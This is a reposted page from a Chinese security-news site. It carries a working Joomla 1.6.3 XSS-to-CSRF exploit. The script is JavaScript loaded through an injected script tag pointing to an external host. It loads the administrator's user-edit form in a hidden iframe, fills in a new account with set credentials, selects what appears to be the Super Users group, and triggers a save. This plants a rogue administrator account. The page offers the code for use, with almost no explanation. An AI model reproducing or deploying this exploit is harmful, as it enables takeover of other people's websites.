当前位置:七道奇文章资讯安全技术网络技术
日期:2011-07-07 12:26:00  来源:本站整理

Joomla 1.6.3 CSRF Exploit[网络技术]

赞助商链接



  本文“Joomla 1.6.3 CSRF Exploit[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability  /*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
 
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"><script src=http://www.110hack.com/joom163.js></script>
 
*/
document.writeln('<iframe id="iframe" src="http://www.110hack.com/administrator/index.php?option=com_users&view=user&layout=edit" width="0" height="0" style="visibility:hidden;" ></iframe>');
 
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
 
document.getElementById("iframe").contentDocument.forms[0].jform_name.value = name;
document.getElementById("iframe").contentDocument.forms[0].jform_username.value = username;
document.getElementById("iframe").contentDocument.forms[0].jform_password.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_password2.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_email.value = email;
document.getElementById("iframe").contentDocument.forms[0].getElementById("1group_8").checked=true;
document.getElementById("iframe").contentDocument.getElementsByTagName("a")[11].onclick();
}


  以上是“Joomla 1.6.3 CSRF Exploit[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • Joomla 1.6.3 CSRF Exploit
  • Joomla扩大操纵手记:shoutbox中文站点评论模块
  • <b>Joomla扩大操纵手记:给SMF论坛加上WYSIWYG编辑器</b>
  • Joomla扩大操纵手记:ChronoComments文章评论组件
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .